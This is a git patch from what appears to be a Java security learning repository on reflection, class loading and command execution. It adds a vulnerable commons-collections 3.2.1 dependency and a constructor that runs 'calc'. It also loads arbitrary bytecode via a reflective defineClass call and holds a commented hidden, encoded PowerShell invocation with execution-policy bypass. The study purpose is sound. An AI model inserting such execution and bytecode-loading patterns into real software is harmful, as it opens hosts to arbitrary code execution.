"b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" deleted file mode 100644 index c630665..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.study; - -public class RuntimeExec { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" deleted file mode 100644 index d901a07..0000000 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/tmp.java" +++ /dev/null @@ -1,4 +0,0 @@ -package com.test.study; - -public class tmp { -} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/encodings.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/misc.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/.idea/vcs.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" new file mode 100644 index 0000000000000000000000000000000000000000..a4adc653becc3b56a0436e8e4bebe4f75f66e7d1 GIT binary patch literal 784 zcmZuvU2hUW6g>mT>@JH1S`=GtDYX__+x4SwZG17Bn4l%nXnb782`;iTxI1Y5MLySu z)@Y*d{wVeCf)o??;cn)fd+s^&@$=W$?*R6(@1Tg9jcZu8u;So4Za7%QnuU7uU*~9W zY&fuS)50dlEsiaQ{9&L1^ME1SY`tK}J=Cuy!$Lby^4U1-$>`Yc4GAfBjW6Cl^+)MC zRW}%{LouA{ovt27LOu?X?m|aKu~vHn|Gn?xG8Q#3ms5g+p`~!7A#zuy8OnOX2wf#3sCkmA5 znn?QL!Cb^Sn1PRyrXhu`HYdU~E~x_5KS++feBnLa1cTF;X11s{TXV`OOolmmB56xo z|C>7}=tNq`I3_`DzVrA^q(3D0OChihmmW~^Wx$d literal 0 HcmV?d00001 diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" new file mode 100644 index 0000000000000000000000000000000000000000..94ba715c97193a50cd3e6ed25bd6504183974d4f GIT binary patch literal 881 zcmZva?N8HC6vm&s&9y5XjIqL;3KK*&5b6uQBoMzCO^8#7TQq*NyStekUGHpf75^eX z>jyBJ=y(4p^|X{R6Vv4O-gC}#e$RdR_50fo0NZ$AU>cVSxQr`077Z++Zs01Gb*#ky zYZ_KHTsKg_nvRB!riOJ58w?q@$H4X&^1H6@s)r2OM)M^@?vd;XhMAV@i|5g>D}s*G z^(azoD~BIGb4JNJX|u|p?{Y8I8*Lc{Ts(2(YO}4Pp77PyzN$Sjei8Y~9g1->2H$6>oB>1SD3{l}p5%uNnlF_YIdl#dmqS~LP}w6nkak+mP&#kD z-yI09{t2}|hDr?S;ABJzt99n?AaH%vR)KJaI}@fS!o(iMMIPC=8mGc!1Eg~O{!V-m zv*+w|TMR~DsPV#TG$)j4n1DHPBsjy`|N2e{4g$$V7?PkmS=o6T$Pe+2lL>l2MS5NU zJr~TNM6(Rd=`v}Yqt!cPDFUplpMZTqrkp)S?kg^o^T*I$eL}JI9fj8$Coq0~CW#3P zRp=zCkZ2JajXHAlI897ZZknUTF-8 + + + commons-collections + commons-collections + 3.2.1 + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" new file mode 100644 index 0000000..287b878 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" @@ -0,0 +1,18 @@ +package com.test.pojo; + +import java.io.IOException; + +public class Person { + public Person() { + try { + System.out.println("Person non-args constructor"); + Runtime.getRuntime().exec("calc"); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + + static { + System.out.println("Person static"); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" new file mode 100644 index 0000000..d901fbe --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" @@ -0,0 +1,20 @@ +package com.test.study; + +import com.test.pojo.Baka; + +public class Loader { + public static void main(String[] args) throws Exception { + Class bakaClass = Baka.class; + System.out.println("================="); +// Class.forName("com.test.pojo.Baka"); // 触发static +// System.out.println("=================="); +// Class.forName("com.test.pojo.Baka", false, ClassLoader.getSystemClassLoader()); // 不触发 +// System.out.println("================="); +// Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader()); // 触发static +// System.out.println("=================="); +// ClassLoader classLoader = ClassLoader.getSystemClassLoader(); +// classLoader.loadClass("com.test.pojo.Baka"); // 无事发生 +// System.out.println("=================="); + Baka baka = Baka.class.newInstance(); // 触发无参构造和static + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" new file mode 100644 index 0000000..0620b0c --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" @@ -0,0 +1,27 @@ +package com.test.study; + +import java.io.IOException; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class define2Load { + public static void main(String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException, ClassNotFoundException { + ClassLoader classLoader = define2Load.class.getClassLoader(); + byte[] bytes = Files.readAllBytes(Paths.get("Student.class")); + Class clazz = ClassLoader.class; +// Constructor declaredConstructor = clazz.getDeclaredConstructor(); +// declaredConstructor.setAccessible(true); +// ClassLoader classLoader = declaredConstructor.newInstance(); + Method defineClass = clazz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); + defineClass.setAccessible(true); + Class student = (Class) defineClass.invoke(classLoader, bytes, 0, bytes.length); +// Class.forName("com.test.pojo.Student"); + student.newInstance(); +// Class.forName("com.test.pojo.Student"); + } + + +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" new file mode 100644 index 0000000..3dff7e4 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,7 @@ +package com.test.study; + +public class tmp { + public static void main(String[] args) throws ClassNotFoundException { + Class.forName("com.test.pojo.Student"); + } +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/encodings.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/misc.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/vcs.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/.idea/workspace.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/pom.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/WEB-INF/web.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/index.jsp" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" new file mode 100644 index 0000000000000000000000000000000000000000..ca9053508c38ce794241a50d536ce683f2f662f4 GIT binary patch literal 8 PcmezW&yazafr|kE5MTmE literal 0 HcmV?d00001 diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" similarity index 97% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" index c54b471..63aed70 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" @@ -1,6 +1,6 @@ package com.test.pojo; -public class Baka { +public class Baka extends Object{ public String name; protected int gender; private int age; diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" new file mode 100644 index 0000000000000000000000000000000000000000..94ba715c97193a50cd3e6ed25bd6504183974d4f GIT binary patch literal 881 zcmZva?N8HC6vm&s&9y5XjIqL;3KK*&5b6uQBoMzCO^8#7TQq*NyStekUGHpf75^eX z>jyBJ=y(4p^|X{R6Vv4O-gC}#e$RdR_50fo0NZ$AU>cVSxQr`077Z++Zs01Gb*#ky zYZ_KHTsKg_nvRB!riOJ58w?q@$H4X&^1H6@s)r2OM)M^@?vd;XhMAV@i|5g>D}s*G z^(azoD~BIGb4JNJX|u|p?{Y8I8*Lc{Ts(2(YO}4Pp77PyzN$Sjei8Y~9g1->2H$6>oB>1SD3{l}p5%uNnlF_YIdl#dmqS~LP}w6nkak+mP&#kD z-yI09{t2}|hDr?S;ABJzt99n?AaH%vR)KJaI}@fS!o(iMMIPC=8mGc!1Eg~O{!V-m zv*+w|TMR~DsPV#TG$)j4n1DHPBsjy`|N2e{4g$$V7?PkmS=o6T$Pe+2lL>l2MS5NU zJr~TNM6(Rd=`v}Yqt!cPDFUplpMZTqrkp)S?kg^o^T*I$eL}JI9fj8$Coq0~CW#3P zRp=zCkZ2JajXHAlI897ZZkn 1.txt").getInputStream(); +// System.out.println(IOUtils.toString(inputStream)); +// inputStream = Runtime.getRuntime().exec("powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ZQBjAGgAbwAgADEAIAA+ACAAMQAuAHQAeAB0AA==").getInputStream(); + } +} diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" similarity index 100% rename from "Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" new file mode 100644 index 0000000..c883171 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,16 @@ +package com.test.study; + +import org.apache.commons.io.IOUtils; + +import java.io.IOException; +import java.io.InputStream; + +public class tmp { + public static void main(String[] args) throws IOException { +// Runtime runtime = new Runtime(); +// runtime.exec("calc"); + Process exec = Runtime.getRuntime().exec("whoami"); + InputStream inputStream = exec.getInputStream(); + System.out.println(IOUtils.toString(inputStream)); + } +} From 23918ddcef93bcb999eb5396ac460a99c9e27785 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Tue, 14 Oct 2025 13:37:57 +0800 Subject: [PATCH 10/16] =?UTF-8?q?update:=E6=9B=B4=E6=96=B0SPEL=E4=BB=A3?= =?UTF-8?q?=E7=A0=81?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../SPEL/.gitignore" | 38 ++++++++++ .../SPEL/.idea/.gitignore" | 8 ++ .../SPEL/.idea/encodings.xml" | 7 ++ 